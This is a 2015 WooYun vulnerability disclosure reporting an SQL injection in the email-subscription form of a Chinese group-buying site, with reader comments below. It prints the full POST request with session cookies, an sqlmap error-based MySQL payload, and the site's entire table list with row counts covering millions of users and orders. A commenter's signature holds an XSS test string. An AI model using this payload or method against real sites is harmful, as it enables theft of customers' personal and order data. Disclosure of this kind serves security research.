当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134963

漏洞标题:团购王主站另一SQL注射806万用户&417万订单信息

相关厂商:团购王

漏洞作者: 深度安全实验室

提交时间:2015-08-18 11:05

修复时间:2015-08-23 11:06

公开时间:2015-08-23 11:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-18: 细节已通知厂商并且等待厂商处理中
2015-08-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

登陆之后,进入个人中心进行邮件订阅:

91.png


POST /index.php?m=settings HTTP/1.1
Host: www.go.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.go.cn/index.php?m=settings
Cookie: city=51; cityname=anshan; citynames=%E9%9E%8D%E5%B1%B1; history=www.wooyun.org; PHPSESSID=l48jsm5n8isjni7vuoop60tfv3; sessionid_cart=l48jsm5n8isjni7vuoop60tfv3; defaultcityname_head=shenyang; defaultcitychinesename_head=%E6%B2%88%E9%98%B3; __utma=241146517.809255357.1439863430.1439863430.1439863430.1; __utmb=241146517.31.10.1439863430; __utmc=241146517; __utmz=241146517.1439863430.1.1.utmcsr=wooyun.org|utmccn=(referral)|utmcmd=referral|utmcct=/bugs/wooyun-2015-0118425; Hm_lvt_6b810083d1fb4aec26d2e6992d268ee7=1439863430; Hm_lpvt_6b810083d1fb4aec26d2e6992d268ee7=1439865265; _adwb=148565553; _adwc=148565553; _adwp=148565553.5245037997.1439863429.1439863429.1439863429.1; _adwr=148565553%23http%253A%252F%252Fwww.wooyun.org%252Fbugs%252Fwooyun-2015-0118425; CNZZDATA1000130237=1231212462-1439860878-http%253A%252F%252Fwww.wooyun.org%252F%7C1439860878; _jzqa=1.1319235239127696600.1439863441.1439863441.1439863441.1; _jzqb=1.34.10.1439863441.1; _jzqc=1; _jzqx=1.1439863441.1439863441.1.jzqsr=wooyun%2Eorg|jzqct=/bugs/wooyun-2015-0118425.-; _jzqckmp=1; show_add=1; sortby=default; buyurl=http%3A%2F%2Fwww.go.cn%2Fdeal%2Fdeal-1055253.html; return_url=%2Fdeal%2Fdeal-1055253.html; view_goods=%7B%22gid_1055253%22%3A%22gid_1055253%22%7D; login360url=%2Findex.php%3Fm%3Dlogin; return_sourcepage=http%3A%2F%2Fwww.go.cn%2Fdeal%2Fdeal-1055253.html%3Floginsuccess%3Dtrue; login_buy_url=http%3A%2F%2Fwww.go.cn%2Findex.php%3Fm%3Dlogin; codeyama=l48jsm5n8isjni7vuoop60tfv3; __utmt=1; key=Aw9fAAUKCwYMAwdaUAMIUgIIUg4PBlZZDw9ZUwAIDwkLAAIIBQkDBgILAQdYAFJaAQpaBAUKBlADBFY%3D; _qzja=1.1332113766.1439863442365.1439863442365.1439863442365.1439865261416.1439865265369.9670559.1.0.30.1; _qzjb=1.1439863442365.30.0.0.0; _qzjc=1; _qzjto=30.1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
subscribe=1&do=subscribe

subscribe参数

92.png

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: subscribe
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: subscribe=1 AND (SELECT 2426 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (CASE WHEN (2426=2426) THEN 1 ELSE 0 END)),0x7171756e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&do=subscribe
---
back-end DBMS: MySQL >= 5.0.0
Database: go.cn
+-------------------------------------------+---------+
| Table                                     | Entries |
+-------------------------------------------+---------+
| jiuder_source_address_history             | 31943364 |
| jiuder_user                               | 8062637 |
| jiuder_adminlog                           | 6192775 |
| jiuder_KeywordSearchInfo                  | 5651043 |
| jiuder_smslog_20130817                    | 4231301 |
| jiuder_order                              | 4174830 |
| jiuder_subway_station_group_relation      | 2776647 |
| jiuder_maillog                            | 2422352 |
| jiuder_useraddress                        | 2367218 |
| jiuder_network                            | 2275597 |
| jiuder_usercoupons                        | 1639316 |
| jiuder_access_info                        | 1512328 |
| jiuder_creditlog                          | 1487275 |
| jiuder_brand_click                        | 1161373 |
| jiuder_supplier_tuikuan_flow_log          | 1065049 |
| jiuder_group                              | 1043867 |
| jiuder_group_copy                         | 1043867 |
| jiuder_group_copy1                        | 1043867 |
| jiuder_baidu_type_group                   | 1043861 |
| jiuder_group_relation_changecate2         | 1040469 |
| jiuder_group_relation_changecate          | 1039236 |
| jiuder_supplier_lalotude                  | 1032639 |
| jiuder_group_information                  | 1024431 |
| jiuder_360_type_group                     | 1004924 |
| jiuder_operation_history                  | 940140  |
| jiuder_othersites_relation_group          | 854442  |
| jiuder_area_business_group_relation       | 850113  |
| jiuder_water_table_set                    | 740059  |
| jiuder_groupcoupons                       | 736374  |
| jiuder_orderlog                           | 730278  |
| jiuder_invalid_order                      | 695579  |
| jiuder_lottery                            | 675531  |
| jiuder_baidurecord                        | 475263  |
| jiuder_asyncode_order                     | 475174  |
| ip_address                                | 403719  |
| jiuder_smslog                             | 399842  |
| jiuder_source                             | 377672  |
| jiuder_user_subjoin                       | 346186  |
| jiuder_call_log                           | 340588  |
| jiuder_supplier_schedule                  | 331731  |
| jiuder_supplier_tuikuan_yunfei            | 318747  |
| jiuder_group_property_value               | 303649  |
| jiuder_error_log                          | 274149  |
| jiuder_order_return_log                   | 216606  |
| jiuder_supplier_tuikuan_flow_log_history  | 209341  |
| jiuder_asyncode_order_history             | 207810  |
| jiuder_supplier_tuikuan_flow_info         | 206542  |
| jiuder_supplier_tuikuan                   | 198427  |
| jiuder_total_salenum_table                | 195616  |
| jiuder_group_relation_type                | 157447  |
| jiuder_click_demand                       | 127518  |
| jiuder_consult                            | 121302  |
| jiuder_group_property_relation            | 120071  |
| jiuder_group_top_gid                      | 115480  |
| jiuder_order_return                       | 104925  |
| jiuder_api_visits                         | 104008  |
| jiuder_complaints                         | 103539  |
| jiuder_othersites_relation_user           | 98315   |
| jiuder_group_oneday_statistics            | 97446   |
| jiuder_totalorder                         | 89062   |
| jiuder_chargecard                         | 84374   |
| jiuder_KeywordSearchHistory               | 84320   |
| jiuder_feedback                           | 82588   |
| jiuder_ctrip_usetime_change               | 75469   |
| jiuder_supplier_tuikuan_flow_info_history | 74400   |
| jiuder_supplier_tuikuan_history           | 72770   |
| jiuder_othersites_relation_order          | 67580   |
| jiuder_group_property_name                | 67258   |
| jiuder_waplog                             | 58926   |
| jiuder_water_table                        | 56507   |
| jiuder_luckgame_log                       | 54031   |
| jiuder_source_address                     | 52825   |
| jiuder_voucher_order_act                  | 51440   |
| jiuder_daily_statistic                    | 51100   |
| jiuder_projects                           | 41561   |
| jiuder_invite                             | 37080   |
| jiuder_modify_mobilebind                  | 33050   |
| jiuder_comeAndSend_rule                   | 32907   |
| jiuder_holiday                            | 28506   |
| jiuder_area_and_business                  | 25055   |
| jiuder_supplier                           | 22215   |
| jiuder_change_api_gid                     | 21420   |
| jiuder_group_api_line                     | 21329   |
| egg_record                                | 17002   |
| jiuder_maillist                           | 13299   |
| jiuder_supplier_tuikuan_account           | 12600   |
| jiuder_masses_comments                    | 11658   |
| jiuder_set_jinshan_api                    | 11650   |
| tmp                                       | 10000   |
| jiuder_redbag                             | 9870    |
| jiuder_comeAndSend_order                  | 9705    |
| jiuder_blog                               | 9667    |
| jiuder_hotel_special                      | 8671    |
| jiuder_area_and_business_old              | 7385    |
| jiuder_group_abnormal                     | 7286    |
| jiuder_brand_group                        | 5123    |
| jiuder_advertisement_ip                   | 4732    |
| jiuder_voucher                            | 4618    |
| jiuder_area                               | 3434    |
| jiuder_group_remarks                      | 3013    |
| tmp1                                      | 2922    |
| jiuder_user_feedback                      | 2473    |
| jiuder_sogou_movie_dic                    | 2385    |
| egg_user                                  | 2284    |
| jiuder_illegal_character                  | 1997    |
| user_stats                                | 1849    |
| jiuder_brand                              | 1796    |
| jiuder_incomestats                        | 1734    |
| lottery_random                            | 1692    |
| jiuder_links                              | 1680    |
| jiuder_subway_real_sta                    | 1589    |
| jiuder_grouptype_recommend_group          | 1492    |
| jiuder_group_infotype_changecate          | 1426    |
| jiuder_users_days                         | 1425    |
| jiuder_subway_station                     | 1335    |
| jiuder_360_movie_dic                      | 1333    |
| jiuder_group_type_relation                | 1299    |
| jiuder_group_quantity                     | 1188    |
| jiuder_supplier_schedule_2012             | 1051    |
| jiuder_hotel_busarear                     | 1030    |
| jiuder_advertisement                      | 784     |
| jiuder_grouptype_changecate2              | 771     |
| cometchat_guests                          | 713     |
| jiuder_group_infotype                     | 575     |
| jiuder_dazhaxie_results                   | 540     |
| jiuder_city                               | 521     |
| jiuder_topgroup                           | 510     |
| jiuder_city_old                           | 489     |
| jiuder_special_provision                  | 477     |
| jiuder_gocn2taobao_city                   | 417     |
| jiuder_360_type_api                       | 384     |
| jiuder_korea_type                         | 352     |
| jiuder_group_dis_none                     | 350     |
| jiuder_grouptype_changecate               | 350     |
| jiuder_hot_recommend_group                | 346     |
| jiuder_sensitive_keywords                 | 340     |
| jiuder_baidu_type_api                     | 304     |
| jiuder_group_type_relation_korea          | 298     |
| jiuder_gocn2taobao_category               | 286     |
| jiuder_user_manager_relation              | 284     |
| jiuder_brand_wangyi                       | 273     |
| jiuder_manager                            | 257     |
| jiuder_set_likeorhot                      | 221     |
| jiuder_gocn2taobao_shopcategory           | 195     |
| jiuder_boutique_image                     | 144     |
| jiuder_lookoo                             | 140     |
| jiuder_water_initparam                    | 123     |
| jiuder_gocn2taobao_props                  | 117     |
| jiuder_suppliersname                      | 96      |
| jiuder_group_dis_somecity                 | 89      |
| jiuder_subway                             | 89      |
| jiuder_asvalue_gratia                     | 87      |
| jiuder_luckgame_timenum                   | 82      |
| jiuder_activesubject                      | 74      |
| jiuder_boutique_group                     | 70      |
| jiuder_express                            | 70      |
| jiuder_grouptype                          | 68      |
| jiuder_dis_360_somecity                   | 62      |
| jiuder_group_store                        | 46      |
| cometchat                                 | 40      |
| jiuder_batch_days_type                    | 37      |
| jiuder_batch_replacement_products         | 36      |
| jiuder_set_api_allcity                    | 27      |
| jiuder_group_layout                       | 26      |
| jiuder_korea_quantity                     | 22      |
| jiuder_openapp_open_task                  | 22      |
| jiuder_hottag                             | 21      |
| jiuder_batch_reset_list                   | 20      |
| jiuder_group_warning                      | 20      |
| jiuder_brand_sort                         | 19      |
| jiuder_chargecard_log                     | 18      |
| jiuder_mainvalue_gratia                   | 17      |
| jiuder_voucher_rule_act                   | 17      |
| jiuder_water_table_dazhaxie               | 16      |
| jiuder_water_basicparam                   | 15      |
| jiuder_luckgame_prize                     | 14      |
| jiuder_userprise                          | 14      |
| jiuder_gocn2taobao_relation               | 11      |
| jiuder_hot_recommend_type                 | 11      |
| jiuder_ads_management                     | 10      |
| jiuder_openapp_ecode_cancel_task          | 10      |
| jiuder_taobao_task_list                   | 10      |
| cometchat_status                          | 8       |
| jiuder_boutique_typename                  | 7       |
| jiuder_set_sougouapi                      | 7       |
| jiuder_suppliertype                       | 7       |
| jiuder_Keyword_Default                    | 6       |
| jiuder_openapp_cooperation                | 6       |
| jiuder_change_code                        | 4       |
| jiuder_gocn2taobao_shopcategory_adapter   | 4       |
| jiuder_groupsmslog                        | 4       |
| jiuder_openapp_ecode_operate_log          | 4       |
| jiuder_group_endtime_change               | 3       |
| jiuder_openapp_order_relation             | 3       |
| jiuder_openapp_user_reg                   | 3       |
| cif_appinfo                               | 2       |
| jiuder_ctrip_commission                   | 2       |
| jiuder_openapp_ecode_cancel_log           | 2       |
| jiuder_relation_group                     | 2       |
| cif_member                                | 1       |
| jiuder_luckgame_param                     | 1       |
| jiuder_openapp_main_task                  | 1       |
| jiuder_plugin                             | 1       |
| jiuder_site                               | 1       |
| jiuder_small_sticker                      | 1       |
| jiuder_wyt_entrance                       | 1       |
| tbl_session                               | 1       |
+-------------------------------------------+---------+

漏洞证明:

用户信息:

93.png

订单信息:

94.png

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-23 11:06

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2015-08-18 11:06 | Manning ( 普通白帽子 | Rank:559 漏洞数:78 | 就恨自己服务器太少)

    这种给力

  2. 2015-08-18 12:23 | 卖C4的小男孩 ( 实习白帽子 | Rank:65 漏洞数:6 | 啦啦啦 啦啦啦 我是一个卖C4的小行家!...)

    66666

  3. 2015-08-18 16:49 | 开心一下1313 ( 实习白帽子 | Rank:63 漏洞数:20 | 喝口水,压压惊......)

    数据太吓人

  4. 2015-08-18 17:39 | 天道酬勤 ( 路人 | Rank:1 漏洞数:1 | 勤学·求教·)

    很给力

  5. 2015-08-23 11:09 | Alsn ( 实习白帽子 | Rank:32 漏洞数:4 | 在茫茫的网络海洋中,寻找那双正义,正能量...)

    厉害

  6. 2015-08-23 16:49 | 日出东方 ( 普通白帽子 | Rank:157 漏洞数:51 )

    漏洞真是哪都可能呀

  7. 2015-08-27 16:41 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    @深度安全实验室 Table | Entries | entries 这个参数怎么显示??

  8. 2015-08-28 15:34 | 开心一下1313 ( 实习白帽子 | Rank:63 漏洞数:20 | 喝口水,压压惊......)

    @深度安全实验室 Table | Entries 这个参数怎么显示??求解

  9. 2015-08-28 15:39 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    @开心一下1313 --count

  10. 2015-08-28 15:46 | 开心一下1313 ( 实习白帽子 | Rank:63 漏洞数:20 | 喝口水,压压惊......)

    @深度安全实验室 好的,感谢